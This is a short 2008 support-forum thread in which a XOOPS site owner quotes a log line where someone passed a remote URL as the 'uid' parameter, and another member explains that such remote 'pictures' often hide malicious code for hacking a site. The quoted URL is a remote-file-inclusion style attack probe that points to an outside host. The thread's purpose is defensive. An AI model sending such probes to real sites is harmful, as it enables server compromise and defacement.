1
Cuidiu
Spam and/or Hack Attempt
  • 2008/2/5 18:07

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


Hi All,

My logs show someone is messing with my XOOPS 2.2.4 site. Why would someone do this:
domain.com/userinfo.php?uid=http://trashyspamsite.com/pictureofme?

Is there a way to spam a XOOPS site doing the above or does this apply to some other CMS with a vulnerability?

TIA,

Cuidiu
[size=x-small]Working sites:
XOOPS 2.0.16 PHP 5.2.2, MySQL 5.0.24a-standard-log, Apache/2.0.54 (Unix)
XOOPS 2.2.4, PHP 4.3.10, MySQL 3.23.58, Apache/1.3.33 (Unix)[/size]

2
blueteen
Re: Spam and/or Hack Attempt
  • 2008/2/5 18:55

  • blueteen

  • Quite a regular

  • Posts: 379

  • Since: 2004/7/16


Often, a picture called like this (remote url), is a malicious code in reality. (on windows system, try to download this picture, then edit with a text editor).
This is a way to deface or hack your website/server.

It's a good thing to contact the provider's abuse service, providing the link to the picture, some logs samples and few words.

3
Cuidiu
Re: Spam and/or Hack Attempt
  • 2008/2/5 20:35

  • Cuidiu

  • Quite a regular

  • Posts: 358

  • Since: 2006/4/23


Thanks for that info. I guess I still am not clear. Is this something XOOPS is vulnerable to?

Quote:

blueteen wrote:
Often, a picture called like this (remote url), is a malicious code in reality. (on windows system, try to download this picture, then edit with a text editor).
This is a way to deface or hack your website/server.

It's a good thing to contact the provider's abuse service, providing the link to the picture, some logs samples and few words.
[size=x-small]Working sites:
XOOPS 2.0.16 PHP 5.2.2, MySQL 5.0.24a-standard-log, Apache/2.0.54 (Unix)
XOOPS 2.2.4, PHP 4.3.10, MySQL 3.23.58, Apache/1.3.33 (Unix)[/size]

Login

Who's Online

237 user(s) are online (140 user(s) are browsing Support Forums)


Members: 0


Guests: 237


more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Mar 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits